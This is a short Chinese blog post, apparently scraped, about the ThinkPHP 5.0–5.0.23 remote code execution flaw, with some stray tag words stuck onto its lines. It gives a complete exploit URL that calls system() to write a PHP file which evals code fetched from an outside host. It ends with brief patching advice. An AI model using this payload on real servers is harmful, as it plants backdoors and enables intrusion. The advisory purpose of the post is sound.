這個THINKPHP5的漏洞涉及好幾個版本,我測試中5.0.21和5.0.22都有,聽說是5.0 ~ 5.0.23之間的版本都存在,這個漏洞能夠執行寫文件的操做。php
固然了,趕忙升級框架到安全版本是比較好的方式,不過我這邊測試了一下,發現確實能夠經過url訪問注入進行執行寫文件操做,例如thinkphp
http://你的域名/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval(file_get_contents("http%3a%2f%2fcqy666.cn%2fphp.jpg"))?^>>test.php安全
以後在public下面發現了一個PHP文件 是 test.phpapp
內容以下框架
訪問test.php發現測試
我本地執行是這樣的url
而後就沒有而後了 多麼可怕!blog
網上有人說的解決方案是找到 thinkphp/library/think/App.php文件第556行那裏路由
改成get
對控制器進行一次過濾,固然爲了保險仍是要把配置的路由那裏改一下
'url_route_on' => true,